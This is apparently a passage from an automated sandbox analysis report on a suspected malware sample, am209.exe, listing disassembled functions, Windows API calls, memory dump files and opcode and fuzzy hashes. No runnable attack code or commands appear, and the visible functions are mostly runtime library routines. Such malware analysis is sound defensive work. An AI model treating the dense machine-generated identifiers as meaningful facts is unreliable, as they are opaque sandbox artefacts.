                                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\1004899001\am209.exe
                                                                                                                                                                                                                                                    • API String ID: 0-2661768961
                                                                                                                                                                                                                                                    • Opcode ID: 0e0b6cb50e614267603624cee31aadd748372abb8560ec9c69c41f82565392c5
                                                                                                                                                                                                                                                    • Instruction ID: 0d3f71088b64757a2482063a9ea480eed3c8f5bf42b7b94f6c7ea3d22607ba7e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e0b6cb50e614267603624cee31aadd748372abb8560ec9c69c41f82565392c5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4921D171600205BF9B20AF618C85FBB77AFEF56368B10852CF615DB261EB31ED0197A4
                                                                                                                                                                                                                                                    Function 006BD927 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,006BD9E8,?,?,00000000,?,?,006BDA9A,00000002,FlsGetValue,006E33D8,006E33E0,?), ref: 006BD9B7
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                                                                                                    • API String ID: 3664257935-2084034818
                                                                                                                                                                                                                                                    • Opcode ID: ba457049d021d6ee74ff74ad0904b488b308be2d3258b2412fec0d10a2a44c81
                                                                                                                                                                                                                                                    • Instruction ID: 56e500d0c9d196e9c7ffb349a88eb8c1b989d16025cf4403ffcbe582aba0f323
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba457049d021d6ee74ff74ad0904b488b308be2d3258b2412fec0d10a2a44c81
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89117072A41761ABDF226B689C85BDA73A6AB01770F250221ED15EF3C0E770ED8087D5
                                                                                                                                                                                                                                                    Function 006BDDC2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,006BDDB7,?,?,006BDD7F,?,?,?), ref: 006BDDD7
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006BDDEA
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,006BDDB7,?,?,006BDD7F,?,?,?), ref: 006BDE0D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                    • Opcode ID: df9654a2535ff80960cbd0752cd3c2e3b055eaeaac913a218bdb147739adfa5c
                                                                                                                                                                                                                                                    • Instruction ID: 2377fa6fe7850af031f3f5f4e9c906bcd9159d3ff6cce1c9fd28bee3f7faad39
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df9654a2535ff80960cbd0752cd3c2e3b055eaeaac913a218bdb147739adfa5c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FBF01231641759FBDB119B51DD0EBDE7BAAEB01755F1000A4E501AE2A0DF708F41EB94
                                                                                                                                                                                                                                                    Function 006D785C Relevance: 7.7, APIs: 5, Instructions: 244COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __alloca_probe_16__freea$Info
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2330168043-0
                                                                                                                                                                                                                                                    • Opcode ID: de318b4b91528ba22a5f1b3a949d7bc4c60deaabc5554c80b0c4e870ba281859
                                                                                                                                                                                                                                                    • Instruction ID: a676a821245c84ac34e3af147448590f34b59ec51d8680b5f51317dc411f753b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de318b4b91528ba22a5f1b3a949d7bc4c60deaabc5554c80b0c4e870ba281859
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B081A072D0825AABDF209EA48851EEE7BB7EF49310F19015BE844AB341F731DD40C7A6
                                                                                                                                                                                                                                                    Function 006AC5D0 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 13e0504c8c067d5895495113eb2fe35f944fe4b026580aea4fb7d8579fc633c3
                                                                                                                                                                                                                                                    • Instruction ID: 348d2017677759194ec202442a80481ff43e5da0cadb4a27abf5604f5a51c692
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 13e0504c8c067d5895495113eb2fe35f944fe4b026580aea4fb7d8579fc633c3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F081AEB0A04248EFEF14EFA8C945BEE7BB6EF05314F544148E90167282D7759A84CFA6
                                                                                                                                                                                                                                                    Function 006CC356 Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 006CC3DA
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 006CC4A0
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 006CC50C
                                                                                                                                                                                                                                                      • Part of subcall function 006C8305: HeapAlloc.KERNEL32(00000000,?,?,?,006CFA70,00000220,?,?,?,?,?,?,006BEFF2,?), ref: 006C8337
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 006CC515
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 006CC538
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1096550386-0
                                                                                                                                                                                                                                                    • Opcode ID: 0fe80df9b993e9d57b271d4d13621fabe3ad66b6346f009e8068dd6bb0794667
                                                                                                                                                                                                                                                    • Instruction ID: e4217b6f5bd283489433596a4dd0d561e9f6e9dffc6d35bc708a8a008d78c51a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0fe80df9b993e9d57b271d4d13621fabe3ad66b6346f009e8068dd6bb0794667
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A951D172600256AFEB259FA4DC85FFB36ABEB40760F15812DFD0C97240DB30EC5196A0
                                                                                                                                                                                                                                                    Function 006B7030 Relevance: 7.7, APIs: 5, Instructions: 183COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Mtx_unlock$Cnd_broadcastConcurrency::cancel_current_task
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3354401312-0
                                                                                                                                                                                                                                                    • Opcode ID: 2d2b8e3985b69861653dddca6bdc9d7a62322b39e289bc391bd4dffb915ce754
                                                                                                                                                                                                                                                    • Instruction ID: 6084de667658c9c57f6c6b18d7f43de5aebe44c8d990dad5eff804451082c069
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d2b8e3985b69861653dddca6bdc9d7a62322b39e289bc391bd4dffb915ce754
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C6179B090120ADFDF10DFA4C944BEEBBBABF45304F14416DE805AB342DB35AA45CBA4
                                                                                                                                                                                                                                                    Function 006C072C Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,006C065E), ref: 006C074E
                                                                                                                                                                                                                                                    • GetFileInformationByHandle.KERNEL32(?,?), ref: 006C07A8
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,006C065E,?,000000FF,00000000,00000000), ref: 006C0836
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 006C083D
                                                                                                                                                                                                                                                    • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 006C087A
                                                                                                                                                                                                                                                      • Part of subcall function 006C0AA2: __dosmaperr.LIBCMT ref: 006C0AD7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1206951868-0
                                                                                                                                                                                                                                                    • Opcode ID: d110d4728c43ca2132c2c260e0223f5717738118b86ca371c0a0b70c975652b7
                                                                                                                                                                                                                                                    • Instruction ID: d016d1225a701e9c987a7932624413bd98076f5e6070aaf3fb1b649c5bbd7324
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d110d4728c43ca2132c2c260e0223f5717738118b86ca371c0a0b70c975652b7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7414975901344EBEF24AFA5D845EBBBBFAEF89300B00852EF556D7611E6309940CB60
                                                                                                                                                                                                                                                    Function 006D0DDB Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006D0DF3
                                                                                                                                                                                                                                                      • Part of subcall function 006C80D6: HeapFree.KERNEL32(00000000,00000000,?,006D107C,?,00000000,?,?,?,006D131F,?,00000007,?,?,006D17C4,?), ref: 006C80EC
                                                                                                                                                                                                                                                      • Part of subcall function 006C80D6: GetLastError.KERNEL32(?,?,006D107C,?,00000000,?,?,?,006D131F,?,00000007,?,?,006D17C4,?,?), ref: 006C80FE
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006D0E05
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006D0E17
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006D0E29
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006D0E3B
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                    • Opcode ID: 14b94a0e74e809ca9db8c25ee04b2cccba3408c1ab7fe335a5c35ef6278ada3f
                                                                                                                                                                                                                                                    • Instruction ID: 4e4415cdc01b4a1a42b587e4eb72d5a4b2f83f38a921a8497d3739d2b38c289b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 14b94a0e74e809ca9db8c25ee04b2cccba3408c1ab7fe335a5c35ef6278ada3f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71F01232A04200AB9A74DB64E481E7B77EBFA04710B641C0FF018E7B11CFB0FD808A94
                                                                                                                                                                                                                                                    Function 00694910 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 0069499F
                                                                                                                                                                                                                                                      • Part of subcall function 006BAF76: RaiseException.KERNEL32(E06D7363,00000001,00000003,006F39C4,?,?,?,006F39C4), ref: 006BAFD6
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                    • API String ID: 3109751735-1866435925
                                                                                                                                                                                                                                                    • Opcode ID: a40b052d3e088c0b7e4c0d2a8d643e4ba9fb8d0a4b0b8646440c2379df433145
                                                                                                                                                                                                                                                    • Instruction ID: 8584d02a578f24be919054c5fb874018771bd45a8bbbd6ed2434c1e80c12057f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a40b052d3e088c0b7e4c0d2a8d643e4ba9fb8d0a4b0b8646440c2379df433145
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD11E1B15003486BCB10DF99C802FE6B7EEAF51310F14C52EF9658BA41EB70E946CB55
                                                                                                                                                                                                                                                    Function 006C8B6C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(Ck,?,006BE943,?,?,?,6F380EF0), ref: 006C8B74
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,006BE943,?,?,?,6F380EF0), ref: 006C8B7E
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 006C8B85
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DeleteErrorFileLast__dosmaperr
                                                                                                                                                                                                                                                    • String ID: Ck
                                                                                                                                                                                                                                                    • API String ID: 1545401867-308565474
                                                                                                                                                                                                                                                    • Opcode ID: c5c395de7afd9f0c46b3c2487e559ec3483481c672fa6c16a37e36b49f75c09f
                                                                                                                                                                                                                                                    • Instruction ID: 363629f0f8eba95e56a050ed80c01ac4df2923bccc5eda2e896c8d82984f26a1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c5c395de7afd9f0c46b3c2487e559ec3483481c672fa6c16a37e36b49f75c09f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0D012321042486B8F102BF5BC48E6B3B5EDA837783141619F62CCD5A1DE36C8D1A550
                                                                                                                                                                                                                                                    Function 006C90E5 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _strrchr
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3213747228-0
                                                                                                                                                                                                                                                    • Opcode ID: ed276365596a8a1063d24e94a118d056c93bad8c71ebdf723596cc360760eaf0
                                                                                                                                                                                                                                                    • Instruction ID: 8f490876c5413172821034cca0734a26066b1c9cac0810ce3bb116f6e93cb560
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed276365596a8a1063d24e94a118d056c93bad8c71ebdf723596cc360760eaf0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14B11632910286AFDB118F68C889FFEBBE6EF55340F29416EE8459B381D6358E41C774
                                                                                                                                                                                                                                                    Function 006BC9EB Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AdjustPointer
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1740715915-0
                                                                                                                                                                                                                                                    • Opcode ID: f7a2aa842bd18820c98c8a6af53f7977a0ae683e6f0066d2a5fac74faead545c
                                                                                                                                                                                                                                                    • Instruction ID: 3e60c2b90bd8326d83b6afa1230406707814e8e7e76f09af7aa1e5fcf7cd6e45
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f7a2aa842bd18820c98c8a6af53f7977a0ae683e6f0066d2a5fac74faead545c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4751A0F2605606AFDB29CF54D842BFAB7A6EF04320F14412DE8019B291E731EEC1D790
                                                                                                                                                                                                                                                    Function 00699A20 Relevance: 6.2, APIs: 4, Instructions: 155libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetVersionExW.KERNEL32(0000011C,?,495BF602), ref: 00699A99
                                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00699B00
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00699B07
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressHandleModuleProcVersion
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3310240892-0
                                                                                                                                                                                                                                                    • Opcode ID: bd8d7159dc473b51a2381fa83f32f946b28e492653c493aa17bcd74115bcbbc0
                                                                                                                                                                                                                                                    • Instruction ID: 2769cdd41aff5413a2d79df677b0086c4e05136f2cc62df66dbf2d542e66499a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd8d7159dc473b51a2381fa83f32f946b28e492653c493aa17bcd74115bcbbc0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B15124719142089BDF14EB6CDD857EEBB7AEB45310F5042DDE404AB781EB358AC08BA1
                                                                                                                                                                                                                                                    Function 006B5D40 Relevance: 6.1, APIs: 4, Instructions: 141COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 006B5E17
                                                                                                                                                                                                                                                    • std::_Rethrow_future_exception.LIBCPMT ref: 006B5E69
